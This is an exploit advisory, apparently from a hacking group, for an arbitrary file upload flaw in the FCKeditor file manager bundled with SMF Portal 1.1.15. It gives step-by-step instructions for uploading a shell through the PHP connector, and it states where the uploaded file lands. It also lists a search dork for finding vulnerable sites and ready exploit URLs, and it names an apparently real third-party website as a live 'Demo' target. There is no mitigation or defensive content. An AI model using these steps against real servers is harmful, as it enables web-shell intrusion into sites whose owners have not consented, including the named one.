In The Name Of GOD
				
==============================================================================
   
        SMF Portal 1.1.15 (fckeditor)  Arbitrary File Upload Vulnerability
   
==============================================================================
   
    [»] Title   :           [ SMF Portal 1.1.15 (fckeditor)  Arbitrary File Upload Vulnerability ]
     
    [»] TestedON:           [ LINUX ]
   
    [»] Download:           [ http://www.simplemachines.org/ ]
   
    [»] Author  :           [ HELLBOY }
   
    [»] Email   :           [ A68_HELLBOY@YAHOO.COM ]
   
    [»] Date    :           [ 2011-12-2 ]
    
    [»] Version :           [ 1.1.15 ]
 
    [»] Dork    :           [ "Powered by SMF 1.1.15" ]
   
###########################################################################

InformatioN :

1. Go to url : http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

2. SELECT You'r Shell and Click OK.

3. Formats can be uploaded (Php6,Jpg,gif,Xml,...)

4. Uploaded File Location : Target.com/tp-images/File/File Name

###########################################################################

===[ Exploit ]===
  
  [»] http://Target/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  
  [»] http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  
===[ Demo ]===
  
  [»] http://theartglassfactory.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

===[ We Are : ./Iranian HackerZ ]===  
  
  Greetz : BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE

     TBH : HELLBOY , BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE

###########################################################################